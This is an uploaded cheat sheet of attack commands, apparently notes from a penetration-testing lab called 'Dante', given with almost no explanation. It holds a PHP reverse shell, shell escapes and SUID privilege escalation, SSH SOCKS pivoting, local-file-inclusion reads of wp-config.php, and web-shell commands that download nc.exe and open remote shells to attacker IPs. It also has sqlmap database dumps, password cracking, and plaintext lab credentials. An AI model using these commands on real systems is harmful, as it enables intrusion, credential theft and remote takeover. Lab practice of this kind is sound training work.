Dante

The document contains a series of commands and scripts used for network scanning, exploitation, and privilege escalation on various IP addresses. It includes methods for accessing services like FTP and MySQL, executing shell commands, and utilizing tools like Nmap and SQLMap for penetration testing. Additionally, there are references to file manipulation and remote code execution techniques in a Windows environment.
Uploaded by anant

nmap -sVC -p- 10.10.100.0/24 --min-rate=1000

ftp 10.10.110.100

james / Toyota

<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.6/1234 0>&1'"); ?>

python3 -c 'import pty; pty.spawn("/bin/bash")'

cat .bash_history

mysql -u balthazar -p TheJoker12345!

find / -type f -perm -4000 2>/dev/null

python3 -c 'import pty; pty.spawn("/bin/bash")'

find . -exec /bin/sh \; -quit

ssh -i id_rsa -D 1080 [email protected]

socks5 127.0.0.1 1080   (in /etc/proxychains.conf)

for i in {1..255}; do (ping -c 1 172.16.1.$i | grep "bytes from" | cut -d ' ' -f4 | tr -d ':' &); done


proxychains nmap 172.16.1.10 -sT -sV -Pn -T5

proxychains smbclient -L \\172.16.1.10

72.16.1.10/nav.php?page=../../../../etc/passwd

proxychains curl "172.16.1.10/nav.php?page=php://filter/convert.base64-encode/resource=/var/www/html/wordpress/wp-config.php" | base64 -d > wp-config.php

:set shell=/bin/bash
:shell   (get out of controlled vim environment)

TractorHeadtorchDeskmat

import os
os.system("cp /bin/sh /tmp/sh;chmod u+s /tmp/sh")
/tmp/sh -p

admin Password6543
http://172.16.1.13/discuss/ups/shell.php?cmd=powershell wget http://10.10.14.2/nc.exe -o nc.exe

http://172.16.1.13/discuss/ups/shell.php?cmd=nc.exe -e cmd.exe 10.10.14.2 1234

.\druva.py "windows\system32\cmd.exe /C C:\xampp\htdocs\discuss\ups\nc.exe 10.10.14.13 4444 -e cmd.exe"

powershell wget 10.10.14.2/nc.exe -o C:\xampp\htdocs\discuss\ups\nc.exe

c:\python27\python.exe druva.py "windows\system32\cmd.exe /C C:\xampp\htdocs\discuss\ups\nc.exe 10.10.14.2 4444 -e cmd.exe"

dirsearch -u http://172.16.1.12 --proxy socks5://127.0.0.1:1080 -w /usr/share/dirb/wordlists/common.txt

proxychains sqlmap -u http://172.16.1.12/blog/category.php?id=2 --dbs --batch

proxychains sqlmap -u http://172.16.1.12/blog/category.php?id=2 -D blog_admin_db --tables

proxychains sqlmap -u http://172.16.1.12/blog/category.php?id=2 -D blog_admin_db -T membership_users --dump

john hashes.txt --wordlist=/usr/share/wordlists/rockyou.txt --format=Raw-MD5

upload /home/kali/Desktop/Dante/nc.exe/nc.exe C:\\Users\\Katwamba\\Desktop\\nc.exe

execute -f "C:\\Users\\Katwamba\\Desktop\\nc.exe" -a "10.10.14.13 4444 -e cmd.exe"
